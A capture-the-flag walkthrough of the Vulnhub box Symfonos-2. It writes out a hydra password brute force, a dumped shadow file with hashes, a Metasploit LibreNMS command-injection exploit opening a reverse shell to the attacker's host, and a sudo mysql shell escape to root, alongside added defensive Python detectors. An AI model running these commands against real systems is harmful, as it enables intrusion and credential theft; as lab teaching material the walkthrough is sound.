Vulnhub: Symfonos-2
This is the second box in the symfonos series. This series is really well done and is reminiscent of the boxes on HackTheBox, focusing more on exploits than on puzzle-y stuff.
Scanning
Finding the box on the network:
crazyeights@es-base:~$ nmap -PS 192.168.56.1-255
Nmap scan report for 192.168.56.133
Host is up (0.00015s latency).
Not shown: 995 closed ports
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http
139/tcp open netbios-ssn
445/tcp open microsoft-ds
Find specific details about running services (snipped):
crazyeights@es-base:~$ nmap -A -p- 192.168.56.133
Not shown: 65530 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD 1.3.5
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
80/tcp open http WebFS httpd 1.21
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.5.16-Debian (workgroup: WORKGROUP)
The only really important detail here is the hostname: symfonos2
Web:
Index Page:
Downloaded the image from the index page for later (it was a dead end)
Enumerating Server:
crazyeights@es-base:~$ dirb http://192.168.56.133
- There is nothing else on the server.
- Moving on to check the shares.
SMB:
List shares over a null session:
crazyeights@es-base:~$ smbclient -L \\symfonos2 -I 192.168.56.133 -N
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
anonymous Disk
IPC$ IPC IPC Service (Samba 4.5.16-Debian)
SMB1 disabled -- no workgroup available
Connect to the anonymous share over the null session:
crazyeights@es-base:~$ smbclient \\\\symfonos2\\anonymous -I 192.168.56.133 -N
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Thu Jul 18 10:30:09 2019
.. D 0 Thu Jul 18 10:29:08 2019
backups D 0 Thu Jul 18 10:25:17 2019
19728000 blocks of size 1024. 16312448 blocks available
smb: \> cd backups
Download the file log.txt:
smb: \backups\> ls
. D 0 Thu Jul 18 10:25:17 2019
.. D 0 Thu Jul 18 10:30:09 2019
log.txt N 11394 Thu Jul 18 10:25:16 2019
19728000 blocks of size 1024. 16312448 blocks available
smb: \backups\> get log.txt
getting file \backups\log.txt of size 11394 as log.txt (741.8 KiloBytes/sec) (average 741.8 KiloBytes/sec)
smb: \backups\>
In log.txt we find a user:
# Set the user and group under which the server will run.
User aeolus
Group aeolus
- Try to get the user's credentials
- Thought there was something on FTP, so tried to get the user’s password for FTP:
crazyeights@es-base:~$ hydra -l aeolus -P lists/rockyou.txt ftp://192.168.56.133
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ftp://192.168.56.133:21/
[21][ftp] host: 192.168.56.133 login: aeolus password: sergioteamo
1 of 1 target successfully completed, 1 valid password found
crazyeights@es-base:~$
- Nothing extra in ftp
- The found password is the user's password for SSH as well
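As an added detection example from the defender's side (not part of the original writeup), the Python below looks for the pattern the hydra run above produces: many failed logins from one client in a short window. It assumes ProFTPD's default syslog line format for failed logins; the log lines are constructed samples with made-up client names and pids, and the year supplied to the syslog timestamps is an assumption.

```python
import re
from collections import defaultdict
from datetime import datetime

# ProFTPD failed-login line (assumed default syslog format), e.g.
# "Jul 18 10:25:16 symfonos2 proftpd[2041]: symfonos2 (es-base[192.168.56.1]): USER aeolus (Login failed): Incorrect password."
FAIL_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ proftpd\[\d+\]: \S+ "
    r"\((?P<client>[^)]*)\[(?P<ip>[^\]]+)\]\): USER (?P<user>\S+) \(Login failed\): (?P<reason>.*)$"
)

# Constructed sample log: 12 failures in 12 seconds from one client, plus one stray failure elsewhere.
SAMPLE_LOG = [
    f"Jul 18 10:25:{sec:02d} symfonos2 proftpd[2041]: symfonos2 (es-base[192.168.56.1]): "
    f"USER aeolus (Login failed): Incorrect password."
    for sec in range(12)
] + ["Jul 18 10:26:30 symfonos2 proftpd[2042]: symfonos2 (other[192.168.56.50]): USER admin (Login failed): Incorrect password."]


def parse_syslog_ts(ts, year=2019):
    """Syslog stamps carry no year, so the caller supplies one (2019 is an assumption here)."""
    return datetime.strptime(re.sub(r"\s+", " ", ts), "%b %d %H:%M:%S").replace(year=year)


def detect_ftp_bruteforce(lines, threshold=10, window_seconds=60):
    """Alert per source IP whose failed logins reach `threshold` inside any `window_seconds` span."""
    failures = defaultdict(list)              # ip -> [(timestamp, username)]
    for line in lines:
        m = FAIL_RE.match(line)
        if m:
            failures[m["ip"]].append((parse_syslog_ts(m["ts"]), m["user"]))
    alerts = []
    for ip, events in failures.items():
        events.sort()
        best, start = 0, 0
        for end in range(len(events)):        # sliding window over sorted timestamps
            while (events[end][0] - events[start][0]).total_seconds() > window_seconds:
                start += 1
            best = max(best, end - start + 1)
        if best >= threshold:
            alerts.append({"ip": ip, "peak": best, "total": len(events),
                           "users": sorted({u for _, u in events})})
    return alerts


if __name__ == "__main__":
    for alert in detect_ftp_bruteforce(SAMPLE_LOG):
        print(f"possible FTP brute force from {alert['ip']}: {alert['peak']} failures in window, users={alert['users']}")
```

Feed it real syslog lines (for example from /var/log/syslog or journalctl output) and tune the threshold to the site's normal failure rate.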
User:
Login as aeolus:
crazyeights@es-base:~$ ssh aeolus@192.168.56.133
The user has nothing interesting in their home folder:
aeolus@symfonos2:~$ ls
share
aeolus@symfonos2:~$
In the log.txt file found earlier there is the following line; if we can find that backup, we can crack user passwords:
root@symfonos2:~# cat /etc/shadow > /var/backups/shadow.bak
Getting shadow.bak from backups:
aeolus@symfonos2:/var$ cd backups/
aeolus@symfonos2:/var/backups$ cat shadow.bak
root:$6$VTftENaZ$ggY84BSFETwhissv0N6mt2VaQN9k6/HzwwmTtVkDtTbCbqofFO8MVW.IcOKIzuI07m36uy9.565qelr/beHer.:18095:0:99999:7:::
[SNIP]
aeolus:$6$dgjUjE.Y$G.dJZCM8.zKmJc9t4iiK9d723/bQ5kE1ux7ucBoAgOsTbaKmp.0iCljaobCntN3nCxsk4DLMy0qTn8ODPlmLG.:18095:0:99999:7:::
cronus:$6$wOmUfiZO$WajhRWpZyuHbjAbtPDQnR3oVQeEKtZtYYElWomv9xZLOhz7ALkHUT2Wp6cFFg1uLCq49SYel5goXroJ0SxU3D/:18095:0:99999:7:::
mysql:!:18095:0:99999:7:::
Debian-snmp:!:18095:0:99999:7:::
librenms:!:18095::::::
Tried to crack the passwords for the users cronus and root, was unsuccessful:
crazyeights@es-base:~$ john --wordlist=lists/rockyou.txt --rules sym2_pass
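As an added defender-side check (mine, not part of the original walkthrough), this Python script parses shadow-format lines to show which entries hold crackable hashes versus locked accounts, and flags any shadow copy in a backup directory that is readable by group or world, which is exactly the misconfiguration that exposed shadow.bak here. The sample lines are constructed, with placeholder salts and hashes rather than the box's real ones.

```python
import stat
from pathlib import Path

# crypt(3) hash prefixes an offline cracker (john, hashcat) can attack.
CRYPT_IDS = {"$1$": "md5crypt", "$5$": "sha256crypt", "$6$": "sha512crypt", "$y$": "yescrypt"}

# Constructed sample in /etc/shadow format; salts and hashes are placeholders, not real ones.
SAMPLE_SHADOW = [
    "root:$6$constructed$PLACEHOLDERHASHroot:18095:0:99999:7:::",
    "aeolus:$6$constructed$PLACEHOLDERHASHaeolus:18095:0:99999:7:::",
    "mysql:!:18095:0:99999:7:::",
    "librenms:!:18095::::::",
]


def classify_shadow_lines(lines):
    """Map user -> password-field state: 'locked', 'empty', a crypt id name, or 'other'."""
    states = {}
    for line in lines:
        fields = line.strip().split(":")
        if len(fields) < 2 or not fields[0] or fields[0].startswith("#"):
            continue
        user, pw = fields[0], fields[1]
        if pw == "":
            states[user] = "empty"    # login possible without any password
        elif pw.startswith(("!", "*")):
            states[user] = "locked"   # e.g. service accounts such as librenms
        else:
            states[user] = next((n for p, n in CRYPT_IDS.items() if pw.startswith(p)), "other")
    return states


def is_readable_by_others(mode):
    """True when group or world can read; a shadow copy should be 0600 (or 0640 root:shadow)."""
    return bool(mode & (stat.S_IRGRP | stat.S_IROTH))


def find_exposed_shadow_copies(directory):
    """Return [(path, crackable users)] for readable-by-others files that hold crypt hashes."""
    hits = []
    for path in Path(directory).rglob("*"):
        if not path.is_file() or not is_readable_by_others(path.stat().st_mode):
            continue
        try:
            text = path.read_text(errors="ignore")
        except OSError:           # readable by some group we are not a member of
            continue
        users = sorted(u for u, s in classify_shadow_lines(text.splitlines()).items() if s not in ("locked", "empty"))
        if users:
            hits.append((str(path), users))
    return hits
```

Running find_exposed_shadow_copies("/var/backups") as an unprivileged user would have reported shadow.bak on this box; a clean host returns an empty list.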
Noticed this line:
librenms:!:18095::::::
- librenms is a network monitoring system, so there might be another web service running
- Searched for librenms files:
aeolus@symfonos2:~$ find / -name "*librenms*" 2>/dev/null
/var/lib/apache2/site/enabled_by_admin/librenms
/var/lib/mysql/librenms
/opt/librenms
/etc/logrotate.d/librenms
/etc/apache2/sites-available/librenms.conf
/etc/apache2/sites-enabled/librenms.conf
Didn't have permissions to access most of them, but found this file:
aeolus@symfonos2:~$ cat /etc/apache2/sites-available/librenms.conf
<VirtualHost 127.0.0.1:8080>
DocumentRoot /opt/librenms/html/
ServerName localhost
AllowEncodedSlashes NoDecode
<Directory "/opt/librenms/html/">
Require all granted
AllowOverride All
Options FollowSymLinks MultiViews
</Directory>
</VirtualHost>
The service only listens on localhost, so we must use SSH tunnelling (a local port forward) to make it available on our machine:
crazyeights@es-base:~$ ssh -L 9999:localhost:8080 aeolus@192.168.56.133
LibreNMS
LibreNMS has several vulnerabilities, the ones for metasploit seem promising:
crazyeights@es-base:~$ searchsploit librenms
---------------------------------------------- ---------------------------------
Exploit Title | Path
---------------------------------------------- ---------------------------------
LibreNMS - addhost Command Injection (Metaspl | linux/remote/46970.rb
LibreNMS - Collectd Command Injection (Metasp | linux/remote/47375.rb
LibreNMS 1.46 - 'addhost' Remote Code Executi | php/webapps/47044.py
LibreNMS 1.46 - 'search' SQL Injection | multiple/webapps/48453.txt
---------------------------------------------- ---------------------------------
The command injection exploit requires credentials, but we can log in with aeolus's credentials (same as SSH):
Trying the metasploit exploit addhost command injection:
msf5 exploit(linux/http/librenms_addhost_cmd_inject) > options
Module options (exploit/linux/http/librenms_addhost_cmd_inject):
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD sergioteamo yes Password for LibreNMS
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 127.0.0.1 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 9999 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes Base LibreNMS path
USERNAME aeolus yes User name for LibreNMS
VHOST no HTTP server virtual host
Payload options (cmd/unix/reverse):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.56.1 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Linux
We must set LHOST to our address on the vbox host-only interface, since the address must be reachable from the target:
msf5 exploit(linux/http/librenms_addhost_cmd_inject) > exploit
[*] Started reverse TCP double handler on 192.168.56.1:4444
[*] Successfully logged into LibreNMS. Storing credentials...
[SNIP]
[*] Command shell session 1 opened (192.168.56.1:4444 -> 192.168.56.133:43528) at 2021-01-02 22:15:10 -0500
id
uid=1001(cronus) gid=1001(cronus) groups=1001(cronus),999(librenms)
We now have the user cronus. Spawning an interactive shell:
python3 -c 'import pty; pty.spawn("/bin/bash")'
Check if cronus can run anything with elevated privileges:
cronus@symfonos2:/opt/librenms/html$ sudo -l
sudo -l
Matching Defaults entries for cronus on symfonos2:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User cronus may run the following commands on symfonos2:
(root) NOPASSWD: /usr/bin/mysql
We can use the -e (execute) parameter together with the client's \! system command to get a shell:
sudo mysql -e '\! /bin/sh'
# id
id
uid=0(root) gid=0(root) groups=0(root)
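A small added audit helper (mine, not from the writeup) that parses the sudo -l output shown above into structured rules and flags passwordless root rules for commands outside an allowlist; a client such as mysql that can spawn subprocesses from its prompt makes such a rule equivalent to root, as the shell escape above demonstrates. The allowlist is left empty here, and which commands a site puts on it is an assumption for the reader to review.

```python
import re

# One rule line as printed by "sudo -l", e.g. "(root) NOPASSWD: /usr/bin/mysql" or "(ALL : ALL) ALL".
RULE_RE = re.compile(r"^\((?P<runas>[^)]+)\)\s+(?P<tags>(?:[A-Z_]+:\s*)*)(?P<cmds>.+)$")

# The sudo -l output captured on the box, reused here as sample input.
SAMPLE_SUDO_L = r"""
Matching Defaults entries for cronus on symfonos2:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User cronus may run the following commands on symfonos2:
    (root) NOPASSWD: /usr/bin/mysql
"""


def parse_sudo_l(output):
    """Return [{'runas', 'nopasswd', 'commands'}] for each rule after the 'may run' header."""
    rules, in_rules = [], False
    for raw in output.splitlines():
        line = raw.strip()
        if line.startswith("User ") and "may run the following commands" in line:
            in_rules = True
            continue
        m = RULE_RE.match(line) if in_rules and line else None
        if not m:
            continue
        tags = {t.strip() for t in m["tags"].split(":") if t.strip()}
        rules.append({
            "runas": m["runas"].split(":")[0].strip(),   # "(root)" or "(ALL : ALL)" -> user part only
            "nopasswd": "NOPASSWD" in tags,
            "commands": [c.strip() for c in m["cmds"].split(",") if c.strip()],
        })
    return rules


def risky_rules(rules, allowlist=frozenset()):
    """Passwordless rules that run as root (or ALL) any command not explicitly allowlisted."""
    flagged = []
    for rule in rules:
        if rule["runas"] not in ("root", "ALL") or not rule["nopasswd"]:
            continue
        bad = [c for c in rule["commands"] if c == "ALL" or c.split()[0] not in allowlist]
        if bad:
            flagged.append((rule["runas"], bad))
    return flagged


if __name__ == "__main__":
    # With an empty allowlist every passwordless root rule is reported, including the mysql one.
    print(risky_rules(parse_sudo_l(SAMPLE_SUDO_L)))
```

The same parser works on the output of sudo -l -U <user> collected from each host, so the check can run from a central audit job.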
Root Flag:
# cd /root
cd /root
# ls
ls
proof.txt
# cat proof.txt
cat proof.txt
Congrats on rooting symfonos:2!
[SNIP]
FIN. 🥳